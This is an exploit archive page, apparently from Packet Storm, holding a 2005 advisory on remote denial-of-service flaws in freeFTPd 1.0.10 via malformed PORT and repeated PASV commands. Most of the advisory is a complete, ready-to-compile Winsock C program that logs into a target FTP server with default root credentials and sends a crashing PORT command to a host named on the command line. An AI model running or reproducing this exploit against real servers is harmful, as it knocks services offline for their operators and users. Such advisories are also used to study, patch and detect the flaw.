exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

freeFTPDoS.txt

freeFTPDoS.txt
Posted Nov 30, 2005
Authored by Stefan Lochbihler

freeFTPd version 1.0.10 is susceptible to a remote denial of service attack. Exploit included.

tags | exploit, remote, denial of service
SHA-256 | 2138a8818ceed92c5f02b77429a32caf9fc3719509b0fff67d444fb585e34eb4

freeFTPDoS.txt

Change Mirror Download
Author:         Stefan Lochbihler
Date: 24. November 2005
Software: freeFTPd
Version: 1.0.10
URL: http://freeftpd.com/
Attack: Denial of service



about:
freeFTPd is a FTP/FTPS/SFTP server that enables user to
access remote files over TCP/IP network such as Internet.
Unlike FTP, FTPS and SFTP protocols provide security and
strong encryption of data - great for insecure network.


info:
During some tests on the freeftpd project i find out that
it is vulnerable to the following attacks.

[1]

First a loged on user is able to crash the service
if he send a port command and append some numbers.

f.e.
PORT 123

(see exploit section for more details)

[2]

If we send a PASV command with user supplied data
for a period of time the server also freeze.



exploit:

// freeFTPd Denial of Service Attack
// Tested on a Win XP Sp1 Box


#include "stdio.h"
#include "winsock2.h"
#pragma comment (lib,"ws2_32")


#define PORT 21
#define USER "root"
#define PASS "root"
#define L "--------------------------------------------------"
#define HL "freeFTPd (1.0.10) DoS Exploit by steve01@chello.at"
#define BOOM "23"

typedef unsigned long ulong;
ulong resolv_host(char *);

int main(int argc, char* argv[])
{

WSADATA wsa;
SOCKET s_target;
struct sockaddr_in addr;
WORD wsVersion;
int err=0;

if(argc<2)
{
printf("%s\n",L);
printf("%s\n",HL);
printf("%s\n",L);
printf("Usage: %s <www.target.com>\n",argv[0]);
exit(0);
}

printf("%s\n",L);
printf("%s\n",HL);
printf("%s\n",L);


if(WSAStartup(wsVersion=MAKEWORD(2,2),&wsa))
{
printf("Error WSAStartup() Error Code: %d\n",WSAGetLastError());
exit(1);
}



s_target=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(s_target==INVALID_SOCKET)
{
printf("Error socket() Error Code: %d\n",WSAGetLastError());
exit(2);
}


addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr= resolv_host(argv[1]);

if(connect(s_target,(SOCKADDR *)&addr,sizeof(addr)))
{
printf("Error connect() Error Code: %d\n",WSAGetLastError());
exit(3);
}

int recvsize=0;
char recvbuffer[400];
char sendbuffer[400];

//recv banner
recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
recvbuffer[recvsize]='\0';
//send user
strncpy(sendbuffer,"USER ",sizeof(sendbuffer)-1);
strncat(sendbuffer,USER,sizeof(sendbuffer)-strlen(sendbuffer)-1);
strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);

send(s_target,sendbuffer,strlen(sendbuffer),0);

//recv user stuff
recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
recvbuffer[recvsize]='\0';

strncpy(sendbuffer,"PASS ",sizeof(sendbuffer)-1);
strncat(sendbuffer,PASS,sizeof(sendbuffer)-strlen(sendbuffer)-1);
strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);

//send pass
send(s_target,sendbuffer,strlen(sendbuffer),0);

//recv pass stuff
recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
recvbuffer[recvsize]='\0';

strncpy(sendbuffer,"PORT ",sizeof(sendbuffer)-1);
strncat(sendbuffer,BOOM,sizeof(sendbuffer)-strlen(sendbuffer)-1);
strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);
send(s_target,sendbuffer,strlen(sendbuffer),0);


closesocket(s_target);
WSACleanup();



return 0;
}


ulong resolv_host(char *host)
{

ulong uhost=0;
struct hostent *th;

uhost=inet_addr(host);
if(uhost==INADDR_NONE)
{
th=gethostbyname(host);
if(!th)
{
printf("Check if %s is up \n",host);
exit(0);
}

uhost=*(unsigned long*)th->h_addr;

}



return uhost;


}


-------------------------------------------------------------------------------


Vendor Status: No vendor response !


Discovered and copyright by Stefan Lochbihler

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close